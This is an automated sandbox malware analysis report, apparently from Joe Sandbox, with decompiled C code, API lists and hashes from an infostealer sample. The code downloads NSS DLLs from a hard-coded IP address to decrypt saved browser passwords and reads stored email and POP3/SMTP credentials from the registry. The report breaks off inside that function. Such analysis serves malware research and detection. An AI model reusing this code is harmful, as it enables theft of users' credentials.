                                      0x004049b7
                                      0x004049bf
                                      0x004049c3
                                      0x004049c8
                                      0x004049cc
                                      0x004049ce
                                      0x004049d4
                                      0x004049d4
                                      0x004049df
                                      0x004049ec
                                      0x004049ec
                                      0x004049f8

                                      APIs
                                        • Part of subcall function 0040331A: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,004049AA,?), ref: 00403347
                                        • Part of subcall function 0040331A: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,004049AA,?,?,?,?,?), ref: 00403372
                                        • Part of subcall function 00405294: getaddrinfo.WS2_32(?,00000000,004049B2,00000000), ref: 004052E1
                                        • Part of subcall function 00405294: socket.WS2_32(00000002,00000001,00000000), ref: 004052F8
                                        • Part of subcall function 00405294: htons.WS2_32(?), ref: 0040531E
                                        • Part of subcall function 00405294: freeaddrinfo.WS2_32(00000000), ref: 0040532E
                                        • Part of subcall function 00405294: connect.WS2_32(?,?,00000010), ref: 0040533A
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004049DF
                                        • Part of subcall function 004050CC: setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 00405105
                                        • Part of subcall function 004050CC: recv.WS2_32(000000FF,?,00001000,00000000), ref: 00405172
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$FreeSleepVirtualconnectfreeaddrinfogetaddrinfohtonsrecvsetsockoptsocket
                                      • String ID:
                                      • API String ID: 2051680647-0
                                      • Opcode ID: 07fe15add3e9289279a36786145b98f72fe12ffa8fb347736b30218adec9588f
                                      • Instruction ID: 8e6a949757141c599bff318137c809bcce5097105131befab5fba3a685319e32
                                      • Opcode Fuzzy Hash: 07fe15add3e9289279a36786145b98f72fe12ffa8fb347736b30218adec9588f
                                      • Instruction Fuzzy Hash: 5D016171A00615ABCB04BB65C845AEFFB78FB40319F00052AE919B3181DB786915CBD4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00405878(long __ecx) {
                                      				void* _t1;
                                      				long _t7;
                                      				void* _t8;
                                      
                                      				_t7 = __ecx;
                                      				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
                                      				_t8 = _t1;
                                      				E00405966(_t8, _t7);
                                      				return _t8;
                                      			}






                                      0x00405881
                                      0x00405886
                                      0x0040588c
                                      0x00405891
                                      0x0040589b

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,004031A8,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 00405886
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: d9073416d2fd1faa03023874fc1c04eaca6bdd6f5e64a0b109cfe0ff19367257
                                      • Instruction ID: 3f63ec1a31b3eed456ebf4a88602ebc8d5af4db36e99ec9e2590f72e1b0f915e
                                      • Opcode Fuzzy Hash: d9073416d2fd1faa03023874fc1c04eaca6bdd6f5e64a0b109cfe0ff19367257
                                      • Instruction Fuzzy Hash: 26C0122234412026F528112A7C1AF5B8D9CCBC1F75F05002FF705DA2D0D8D00D0181A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00408AEF(void* __eax, void* __ecx) {
                                      				int _t3;
                                      				void* _t5;
                                      
                                      				_t5 =  *(__ecx + 0x10);
                                      				if(_t5 != 0) {
                                      					_t3 = VirtualFree(_t5, 0, 0x8000); // executed
                                      					return _t3;
                                      				} else {
                                      					return __eax;
                                      				}
                                      			}





                                      0x00408aef
                                      0x00408af4
                                      0x00405903
                                      0x00405909
                                      0x00408afa
                                      0x00408afa
                                      0x00408afa

                                      APIs
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: 5c9aa9d59f1d4c3f266fbc9e9648e11d5578a295b7e23ed19a2eb357d29fe5e6
                                      • Instruction ID: 328df8694baeebfeb964f5338988204f6ac9fa0d8813412dd49217591bdbfe0d
                                      • Opcode Fuzzy Hash: 5c9aa9d59f1d4c3f266fbc9e9648e11d5578a295b7e23ed19a2eb357d29fe5e6
                                      • Instruction Fuzzy Hash: 13B0923434070057EE2CDB308D15B6A3611BB84B06FB489ACA68AAA1C08AA9E412DA08
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040590A(long __ecx) {
                                      				void* _t1;
                                      
                                      				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
                                      				return _t1;
                                      			}




                                      0x00405914
                                      0x0040591a

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403418,?,?,?,0040EE0E,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00405914
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: c9658c9e35204f7daf98a3c8dcc1fa9d63f230a411ac8ad79246ea50e1fd0ab6
                                      • Instruction ID: 21e989bf3f32e87747f18243fda0ae1a5c898331392b5dd0f7176367646e8b49
                                      • Opcode Fuzzy Hash: c9658c9e35204f7daf98a3c8dcc1fa9d63f230a411ac8ad79246ea50e1fd0ab6
                                      • Instruction Fuzzy Hash: D4A002F07D53107AFD6D57619F1FF552D18D744F16F114254B30EAC0D095E02510C52D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004058FB(void* __ecx) {
                                      				int _t1;
                                      
                                      				_t1 = VirtualFree(__ecx, 0, 0x8000); // executed
                                      				return _t1;
                                      			}




                                      0x00405903
                                      0x00405909

                                      APIs
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: 0571392a5480f836c776670bcb193f8be09ddc7ebf2dc31b310d72f8261e3615
                                      • Instruction ID: a8a616b64f15f17b29024dd0f08c15f87f013e3e27281ba4811748fd1aaa41c6
                                      • Opcode Fuzzy Hash: 0571392a5480f836c776670bcb193f8be09ddc7ebf2dc31b310d72f8261e3615
                                      • Instruction Fuzzy Hash: D3A0027069071066ED7497305E0AF4539157744B01F308654734EA90D089E5A014CA1C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 98%
                                      			E0040A50C(WCHAR* __ecx, void* __eflags, WCHAR* _a4, WCHAR* _a8) {
                                      				WCHAR* _v8;
                                      				void* _v12;
                                      				WCHAR* _v16;
                                      				WCHAR* _v20;
                                      				WCHAR* _v24;
                                      				void* _v28;
                                      				WCHAR* _v32;
                                      				WCHAR* _v36;
                                      				char _v40;
                                      				char _v44;
                                      				char _v48;
                                      				char _v52;
                                      				short _v564;
                                      				short _v1076;
                                      				short _v1588;
                                      				short _v2100;
                                      				short _v2612;
                                      				short _v3124;
                                      				short _v3644;
                                      				WCHAR* _t223;
                                      				int _t228;
                                      				int _t236;
                                      				void* _t279;
                                      				WCHAR* _t315;
                                      				struct HINSTANCE__* _t317;
                                      				void* _t328;
                                      				char* _t329;
                                      				char* _t330;
                                      				char* _t331;
                                      				WCHAR* _t338;
                                      				WCHAR* _t375;
                                      				short _t376;
                                      				intOrPtr _t400;
                                      				char* _t401;
                                      				void* _t414;
                                      				WCHAR* _t430;
                                      				WCHAR* _t437;
                                      				WCHAR* _t439;
                                      				intOrPtr _t441;
                                      				WCHAR* _t445;
                                      
                                      				_t338 = 0;
                                      				_t437 = __ecx;
                                      				_v8 = __ecx;
                                      				E00401052( &_v3644, 0, 0x104);
                                      				GetCurrentDirectoryW(0x104,  &_v3644);
                                      				if(_a8 != 1 || _t437[0x58] != 0 && _t437[0x52] != 0 && _t437[0x54] != 0 && _t437[0x5a] != 0 && _t437[0x4e] != 0 && _t437[0x56] != 0) {
                                      					SetCurrentDirectoryW(_a4);
                                      					E00403230( &_a4, _t414, __eflags, "\\");
                                      					E004033F3( &_v36,  &_a4);
                                      					E00403230( &_v36, _t414, __eflags, L"nss3.dll");
                                      					E004033F3( &_v16,  &_a4);
                                      					E00403230( &_v16, _t414, __eflags, L"msvcr120.dll");
                                      					E004033F3( &_v20,  &_a4);
                                      					E00403230( &_v20, _t414, __eflags, L"msvcp120.dll");
                                      					E004033F3( &_v32,  &_a4);
                                      					E00403230( &_v32, _t414, __eflags, L"mozglue.dll");
                                      					E004033F3( &_v40,  &_a4);
                                      					E00403230( &_v40, _t414, __eflags, L"softokn3.dll");
                                      					E004033F3( &_v8,  &_a4);
                                      					E00403230( &_v8, _t414, __eflags, L"vcruntime140.dll");
                                      					E004033F3( &_v12,  &_a4);
                                      					E00403230( &_v12, _t414, __eflags, L"msvcp");
                                      					E004033F3( &_v28,  &_a4);
                                      					E00403230( &_v28, _t414, __eflags, L"msvcr");
                                      					_t223 = 0x5a;
                                      					_v24 = _t223;
                                      					_t441 = _t223;
                                      					while(1) {
                                      						E004033F3( &_a8,  &_v12);
                                      						E00403230(E00403038( &_a8, _t414, __eflags, _t441), _t414, __eflags, L".dll");
                                      						_t228 = PathFileExistsW(_a8);
                                      						__eflags = _t228;
                                      						if(_t228 != 0) {
                                      							break;
                                      						}
                                      						_t441 = _t441 + 0xa;
                                      						E004058FB(_a8);
                                      						_a8 = _t338;
                                      						__eflags = _t441 - 0x96;
                                      						if(_t441 != 0x96) {
                                      							continue;
                                      						} else {
                                      							while(1) {
                                      								L53:
                                      								E004033F3( &_a8,  &_v28);
                                      								E00403230(E00403038( &_a8, _t414, __eflags, _v24), _t414, __eflags, L".dll");
                                      								_t236 = PathFileExistsW(_a8);
                                      								__eflags = _t236;
                                      								if(_t236 != 0) {
                                      									break;
                                      								}
                                      								_v24 = _v24 + 0xa;
                                      								E004058FB(_a8);
                                      								__eflags = _v24 - 0x96;
                                      								_a8 = _t338;
                                      								if(__eflags != 0) {
                                      									continue;
                                      								} else {
                                      								}
                                      								L57:
                                      								_t437[0x5a] = LoadLibraryW(_v8);
                                      								_t437[0x50] = LoadLibraryW(_v16);
                                      								_t437[0x52] = LoadLibraryW(_v20);
                                      								_t437[0x54] = LoadLibraryW(_v32);
                                      								_t437[0x56] = LoadLibraryW(_v36);
                                      								E004058FB(_v28);
                                      								E004058FB(_v12);
                                      								E004058FB(_v8);
                                      								E004058FB(_v40);
                                      								E004058FB(_v32);
                                      								E004058FB(_v20);
                                      								E004058FB(_v16);
                                      								_t375 = _v36;
                                      								goto L58;
                                      							}
                                      							E004031FD( &_v16,  &_a8);
                                      							E004058FB(_a8);
                                      							goto L57;
                                      						}
                                      						goto L53;
                                      					}
                                      					E004031FD( &_v20,  &_a8);
                                      					E004058FB(_a8);
                                      					goto L53;
                                      				} else {
                                      					E00401052( &_v2100, _t338, 0x100);
                                      					E00401052( &_v564, _t338, 0x100);
                                      					E00401052( &_v1588, _t338, 0x100);
                                      					E00401052( &_v1076, _t338, 0x100);
                                      					E00401052( &_v3124, _t338, 0x100);
                                      					_t279 = E00401052( &_v2612, _t338, 0x100);
                                      					_v36 = _t338;
                                      					_v32 = _t338;
                                      					_v44 = _t338;
                                      					_v48 = _t338;
                                      					_v52 = _t338;
                                      					_v40 = _t338;
                                      					__imp__InternetCheckConnectionW(L"http://www.google.com", 1, _t338);
                                      					if(_t279 != 0) {
                                      						_v24 = E0040F445(L"http://5.206.225.104/dll/softokn3.dll",  &_v36);
                                      						_v28 = E0040F445(L"http://5.206.225.104/dll/msvcp140.dll",  &_v32);
                                      						_v16 = E0040F445(L"http://5.206.225.104/dll/mozglue.dll",  &_v44);
                                      						_v12 = E0040F445(L"http://5.206.225.104/dll/vcruntime140.dll",  &_v48);
                                      						_a8 = E0040F445(L"http://5.206.225.104/dll/freebl3.dll",  &_v52);
                                      						_v20 = E0040F445(L"http://5.206.225.104/dll/nss3.dll",  &_v40);
                                      						GetTempPathW(0x100,  &_v2612);
                                      						lstrcatW( &_v2612, L"softokn3.dll");
                                      						GetTempPathW(0x100,  &_v564);
                                      						lstrcatW( &_v564, L"msvcp140.dll");
                                      						GetTempPathW(0x100,  &_v1588);
                                      						lstrcatW( &_v1588, L"mozglue.dll");
                                      						GetTempPathW(0x100,  &_v1076);
                                      						lstrcatW( &_v1076, L"vcruntime140.dll");
                                      						GetTempPathW(0x100,  &_v3124);
                                      						lstrcatW( &_v3124, L"freebl3.dll");
                                      						GetTempPathW(0x100,  &_v2100);
                                      						lstrcatW( &_v2100, L"nss3.dll");
                                      						if(_v24 == _t338) {
                                      							L46:
                                      							_t437 = _v8;
                                      						} else {
                                      							_t439 = _v28;
                                      							_t315 = _v16;
                                      							_t400 = _v12;
                                      							_t430 = _a8;
                                      							_t445 = _v20;
                                      							if(_t439 != 0 && _t315 != 0 && _t400 != 0 && _t430 != 0 && _t445 != 0) {
                                      								_t401 = _v24;
                                      								_t328 = 0x5a;
                                      								if( *_t401 != 0x4d ||  *((intOrPtr*)(_t401 + 1)) != _t328) {
                                      									_v24 = _t338;
                                      								} else {
                                      									E0040F52A( &_v2612, _t401, _v36);
                                      									_t328 = 0x5a;
                                      								}
                                      								if( *_t439 != 0x4d ||  *((intOrPtr*)(_t439 + 1)) != _t328) {
                                      									_t439 = _t338;
                                      									_v28 = _t439;
                                      								} else {
                                      									E0040F52A( &_v564, _t439, _v32);
                                      								}
                                      								_t329 = _v16;
                                      								if( *_t329 != 0x4d ||  *((char*)(_t329 + 1)) != 0x5a) {
                                      									_v16 = _t338;
                                      								} else {
                                      									E0040F52A( &_v1588, _t329, _v44);
                                      								}
                                      								_t330 = _v12;
                                      								if( *_t330 != 0x4d ||  *((char*)(_t330 + 1)) != 0x5a) {
                                      									_v12 = _t338;
                                      								} else {
                                      									E0040F52A( &_v1076, _t330, _v48);
                                      								}
                                      								_t331 = _a8;
                                      								if( *_t331 != 0x4d ||  *((char*)(_t331 + 1)) != 0x5a) {
                                      									_t430 = _t338;
                                      									_a8 = _t430;
                                      								} else {
                                      									E0040F52A( &_v3124, _t331, _v52);
                                      									_t430 = _a8;
                                      								}
                                      								if( *_t445 != 0x4d ||  *((char*)(_t445 + 1)) != 0x5a) {
                                      									_t445 = _t338;
                                      									_v20 = _t445;
                                      								} else {
                                      									E0040F52A( &_v2100, _t445, _v40);
                                      									_t430 = _a8;
                                      								}
                                      								_t400 = _v12;
                                      								_t315 = _v16;
                                      							}
                                      							if(_v24 == _t338 || _t439 == 0 || _t315 == 0 || _t400 == 0 || _t430 == 0 || _t445 == 0) {
                                      								goto L46;
                                      							} else {
                                      								_t317 = LoadLibraryW( &_v564);
                                      								_t437 = _v8;
                                      								_t437[0x52] = _t317;
                                      								_t437[0x5a] = LoadLibraryW( &_v1076);
                                      								_t437[0x54] = LoadLibraryW( &_v1588);
                                      								_t437[0x56] = LoadLibraryW( &_v2100);
                                      								_t437[0x58] = LoadLibraryW( &_v2612);
                                      								_t437[0x4e] = LoadLibraryW( &_v3124);
                                      							}
                                      						}
                                      						E004058FB(_v24);
                                      						E004058FB(_v28);
                                      						E004058FB(_v16);
                                      						E004058FB(_v12);
                                      						E004058FB(_a8);
                                      						_t375 = _v20;
                                      						L58:
                                      						E004058FB(_t375);
                                      					}
                                      				}
                                      				_t376 = _t437[0x56];
                                      				_t483 = _t376;
                                      				if(_t376 != 0) {
                                      					_push(_t376);
                                      					_t437[0x30] = E0040E579(_t376, "NSS_Init", _t483);
                                      					_t437[0x3c] = E0040E579(_t437[0x56], "PK11_GetInternalKeySlot", _t483);
                                      					_t437[0x3a] = E0040E579(_t437[0x56], "PK11_Authenticate", _t483);
                                      					_t437[0x34] = E0040E579(_t437[0x56], "PK11SDR_Decrypt", _t483);
                                      					_t437[0x36] = E0040E579(_t437[0x56], "NSSBase64_DecodeBuffer", _t483);
                                      					_t437[0x38] = E0040E579(_t437[0x56], "PK11_CheckUserPassword", _t483);
                                      					_t437[0x32] = E0040E579(_t437[0x56], "NSS_Shutdown", _t483);
                                      					_t437[0x3e] = E0040E579(_t437[0x56], "PK11_FreeSlot", _t483);
                                      					_t437[0x40] = E0040E579(_t437[0x56], "PR_GetError", _t483);
                                      					SetCurrentDirectoryW( &_v3644);
                                      					_t338 = 1;
                                      				}
                                      				E004058FB(_a4);
                                      				return _t338;
                                      			}











































                                      0x0040a524
                                      0x0040a526
                                      0x0040a52a
                                      0x0040a52d
                                      0x0040a53d
                                      0x0040a547
                                      0x0040a8f1
                                      0x0040a8ff
                                      0x0040a90b
                                      0x0040a918
                                      0x0040a924
                                      0x0040a931
                                      0x0040a93d
                                      0x0040a94a
                                      0x0040a956
                                      0x0040a963
                                      0x0040a96f
                                      0x0040a97c
                                      0x0040a988
                                      0x0040a995
                                      0x0040a9a1
                                      0x0040a9ae
                                      0x0040a9ba
                                      0x0040a9c7
                                      0x0040a9ce
                                      0x0040a9cf
                                      0x0040a9d2
                                      0x0040a9d4
                                      0x0040a9db
                                      0x0040a9f0
                                      0x0040a9f8
                                      0x0040a9fe
                                      0x0040aa00
                                      0x00000000
                                      0x00000000
                                      0x0040aa05
                                      0x0040aa08
                                      0x0040aa0d
                                      0x0040aa10
                                      0x0040aa16
                                      0x00000000
                                      0x0040aa18
                                      0x0040aa2e
                                      0x0040aa2e
                                      0x0040aa35
                                      0x0040aa4c
                                      0x0040aa54
                                      0x0040aa5a
                                      0x0040aa5c
                                      0x00000000
                                      0x00000000
                                      0x0040aa61
                                      0x0040aa65
                                      0x0040aa6a
                                      0x0040aa71
                                      0x0040aa74
                                      0x00000000
                                      0x00000000
                                      0x0040aa76
                                      0x0040aa8c
                                      0x0040aa9a
                                      0x0040aaa5
                                      0x0040aab0
                                      0x0040aabb
                                      0x0040aac6
                                      0x0040aacc
                                      0x0040aad4
                                      0x0040aadc
                                      0x0040aae4
                                      0x0040aaec
                                      0x0040aaf4
                                      0x0040aafc
                                      0x0040ab01
                                      0x00000000
                                      0x0040ab01
                                      0x0040aa7f
                                      0x0040aa87
                                      0x00000000
                                      0x0040aa87
                                      0x00000000
                                      0x0040aa16
                                      0x0040aa21
                                      0x0040aa29
                                      0x00000000
                                      0x0040a581
                                      0x0040a58f
                                      0x0040a59d
                                      0x0040a5ab
                                      0x0040a5b9
                                      0x0040a5c7
                                      0x0040a5d5
                                      0x0040a5dd
                                      0x0040a5e0
                                      0x0040a5e3
                                      0x0040a5e6
                                      0x0040a5f1
                                      0x0040a5f4
                                      0x0040a5f7
                                      0x0040a5ff
                                      0x0040a615
                                      0x0040a625
                                      0x0040a635
                                      0x0040a645
                                      0x0040a655
                                      0x0040a668
                                      0x0040a673
                                      0x0040a687
                                      0x0040a695
                                      0x0040a6a3
                                      0x0040a6b1
                                      0x0040a6bf
                                      0x0040a6cd
                                      0x0040a6db
                                      0x0040a6e9
                                      0x0040a6f7
                                      0x0040a705
                                      0x0040a713
                                      0x0040a718
                                      0x0040a8bb
                                      0x0040a8bb
                                      0x0040a71e
                                      0x0040a71e
                                      0x0040a721
                                      0x0040a724
                                      0x0040a727
                                      0x0040a72a
                                      0x0040a72f
                                      0x0040a755
                                      0x0040a75a
                                      0x0040a75e
                                      0x0040a77b
                                      0x0040a765
                                      0x0040a770
                                      0x0040a778
                                      0x0040a778
                                      0x0040a781
                                      0x0040a79b
                                      0x0040a79d
                                      0x0040a788
                                      0x0040a793
                                      0x0040a798
                                      0x0040a7a0
                                      0x0040a7a6
                                      0x0040a7c1
                                      0x0040a7ae
                                      0x0040a7b9
                                      0x0040a7be
                                      0x0040a7c4
                                      0x0040a7ca
                                      0x0040a7e5
                                      0x0040a7d2
                                      0x0040a7dd
                                      0x0040a7e2
                                      0x0040a7e8
                                      0x0040a7ee
                                      0x0040a80c
                                      0x0040a80e
                                      0x0040a7f6
                                      0x0040a801
                                      0x0040a806
                                      0x0040a809
                                      0x0040a814
                                      0x0040a832
                                      0x0040a834
                                      0x0040a81c
                                      0x0040a827
                                      0x0040a82c
                                      0x0040a82f
                                      0x0040a837
                                      0x0040a83a
                                      0x0040a83a
                                      0x0040a840
                                      0x00000000
                                      0x0040a856
                                      0x0040a863
                                      0x0040a865
                                      0x0040a868
                                      0x0040a877
                                      0x0040a886
                                      0x0040a895
                                      0x0040a8a4
                                      0x0040a8b3
                                      0x0040a8b3
                                      0x0040a840
                                      0x0040a8c1
                                      0x0040a8c9
                                      0x0040a8d1
                                      0x0040a8d9
                                      0x0040a8e1
                                      0x0040a8e6
                                      0x0040ab04
                                      0x0040ab04
                                      0x0040ab04
                                      0x0040a5ff
                                      0x0040ab09
                                      0x0040ab0f
                                      0x0040ab11
                                      0x0040ab17
                                      0x0040ab2d
                                      0x0040ab40
                                      0x0040ab53
                                      0x0040ab66
                                      0x0040ab79
                                      0x0040ab8c
                                      0x0040ab9f
                                      0x0040abb2
                                      0x0040abba
                                      0x0040abc8
                                      0x0040abd0
                                      0x0040abd0
                                      0x0040abd4
                                      0x0040abdf

                                      APIs
                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040A53D
                                      • InternetCheckConnectionW.WININET(http://www.google.com,00000001,00000000), ref: 0040A5F7
                                      • GetTempPathW.KERNEL32(00000100,?), ref: 0040A673
                                      • lstrcatW.KERNEL32 ref: 0040A687
                                      • GetTempPathW.KERNEL32(00000100,?), ref: 0040A695
                                      • lstrcatW.KERNEL32 ref: 0040A6A3
                                      • GetTempPathW.KERNEL32(00000100,?), ref: 0040A6B1
                                      • lstrcatW.KERNEL32 ref: 0040A6BF
                                      • GetTempPathW.KERNEL32(00000100,?), ref: 0040A6CD
                                      • lstrcatW.KERNEL32 ref: 0040A6DB
                                      • GetTempPathW.KERNEL32(00000100,?), ref: 0040A6E9
                                      • lstrcatW.KERNEL32 ref: 0040A6F7
                                      • GetTempPathW.KERNEL32(00000100,?), ref: 0040A705
                                      • lstrcatW.KERNEL32 ref: 0040A713
                                      • LoadLibraryW.KERNEL32(?), ref: 0040A863
                                      • LoadLibraryW.KERNEL32(?), ref: 0040A875
                                      • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                      • LoadLibraryW.KERNEL32(?), ref: 0040A893
                                      • LoadLibraryW.KERNEL32(?), ref: 0040A8A2
                                      • LoadLibraryW.KERNEL32(?), ref: 0040A8B1
                                      • SetCurrentDirectoryW.KERNEL32(004097CE,?,00000104,00000000), ref: 0040A8F1
                                      • PathFileExistsW.SHLWAPI(00000001), ref: 0040A9F8
                                      • PathFileExistsW.SHLWAPI(00000001), ref: 0040AA54
                                      • LoadLibraryW.KERNEL32(?,00000001,?,00000104,00000000), ref: 0040AA95
                                      • LoadLibraryW.KERNEL32(00000001,?,00000104,00000000), ref: 0040AAA0
                                      • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AAAB
                                      • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AAB6
                                      • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AAC1
                                      • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040ABC8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad$Path$Templstrcat$CurrentDirectory$ExistsFile$CheckConnectionInternet
                                      • String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$freebl3.dll$http://5.206.225.104/dll/freebl3.dll$http://5.206.225.104/dll/mozglue.dll$http://5.206.225.104/dll/msvcp140.dll$http://5.206.225.104/dll/nss3.dll$http://5.206.225.104/dll/softokn3.dll$http://5.206.225.104/dll/vcruntime140.dll$http://www.google.com$mozglue.dll$msvcp$msvcp120.dll$msvcp140.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll$vcruntime140.dll
                                      • API String ID: 3990745656-2353291846
                                      • Opcode ID: ae822a008d4d7d3c4d5a453b2d66017ce34ba927ad2ab5bc9673db94ab3fe098
                                      • Instruction ID: fedc6cd8f0f478fffef8202fcf4b1e5fd58f8889d7a11bcbece70863cef00a20
                                      • Opcode Fuzzy Hash: ae822a008d4d7d3c4d5a453b2d66017ce34ba927ad2ab5bc9673db94ab3fe098
                                      • Instruction Fuzzy Hash: B4125E71E00209ABCB14EFA1D981AEEB779FF44304F10817BE506B7290DB789A55CF99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 98%
                                      			E00408DB8(void* __ecx, void* __edx, void* __eflags, void* _a4) {
                                      				int _v8;
                                      				intOrPtr _v12;
                                      				char _v16;
                                      				char _v20;
                                      				char _v24;
                                      				char _v292;
                                      				char _v556;
                                      				char _v820;
                                      				char _v9012;
                                      				char _v17204;
                                      				long _t124;
                                      				long _t130;
                                      				long _t136;
                                      				long _t142;
                                      				void* _t180;
                                      				void* _t181;
                                      				void* _t199;
                                      				void* _t207;
                                      				void* _t208;
                                      				void* _t209;
                                      				void* _t210;
                                      				void* _t211;
                                      				void* _t212;
                                      				void* _t213;
                                      				void* _t214;
                                      				void* _t215;
                                      				void* _t216;
                                      				void* _t217;
                                      
                                      				_t199 = __edx;
                                      				_t181 = __ecx;
                                      				E00401130(0x4334, __ecx);
                                      				_v8 = 0x1000;
                                      				_v24 = 0;
                                      				_v20 = 0;
                                      				_t180 = _t181;
                                      				_v16 = 0;
                                      				E00401052( &_v292, 0, 0x104);
                                      				E00401052( &_v556, 0, 0x104);
                                      				E00401052( &_v820, 0, 0x104);
                                      				E00401052( &_v9012, 0, _v8);
                                      				_t207 = _a4;
                                      				_t209 = _t208 + 0x30;
                                      				if(RegQueryValueExW(_t207, L"Account Name", 0, 0,  &_v9012,  &_v8) == 0) {
                                      					E004030C5( &_v20, _t199,  &_v9012);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00401052( &_v9012, 0, 0x1000);
                                      				_t210 = _t209 + 0xc;
                                      				if(RegQueryValueExW(_t207, L"Email", 0, 0,  &_v9012,  &_v8) == 0) {
                                      					E004030C5( &_v20, _t199,  &_v9012);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00401052( &_v9012, 0, 0x1000);
                                      				_t211 = _t210 + 0xc;
                                      				if(RegQueryValueExW(_t207, L"POP3 Server", 0, 0,  &_v9012,  &_v8) == 0) {
                                      					E004030C5( &_v24, _t199,  &_v9012);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00401052( &_v9012, 0, 0x1000);
                                      				_t212 = _t211 + 0xc;
                                      				if(RegQueryValueExW(_t207, L"POP3 User", 0, 0,  &_v9012,  &_v8) == 0) {
                                      					E004030C5( &_v20, _t199,  &_v9012);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00401052( &_v9012, 0, 0x1000);
                                      				_t213 = _t212 + 0xc;
                                      				if(RegQueryValueExW(_t207, L"SMTP Server", 0, 0,  &_v9012,  &_v8) == 0) {
                                      					E004030C5( &_v24, _t199,  &_v9012);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00401052( &_v9012, 0, 0x1000);
                                      				_t214 = _t213 + 0xc;
                                      				_t124 = RegQueryValueExW(_t207, L"POP3 Password", 0, 0,  &_v9012,  &_v8);
                                      				_t225 = _t124;
                                      				if(_t124 == 0) {
                                      					E00401052( &_v17204, _t124, 0x1000);
                                      					E00409150( &_v9012,  &_v17204, _t225, _v8);
                                      					_t214 = _t214 + 0x10;
                                      					E004030C5( &_v16,  &_v17204,  &_v17204);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00401052( &_v9012, 0, 0x1000);
                                      				_t215 = _t214 + 0xc;
                                      				_t130 = RegQueryValueExW(_t207, L"SMTP Password", 0, 0,  &_v9012,  &_v8);
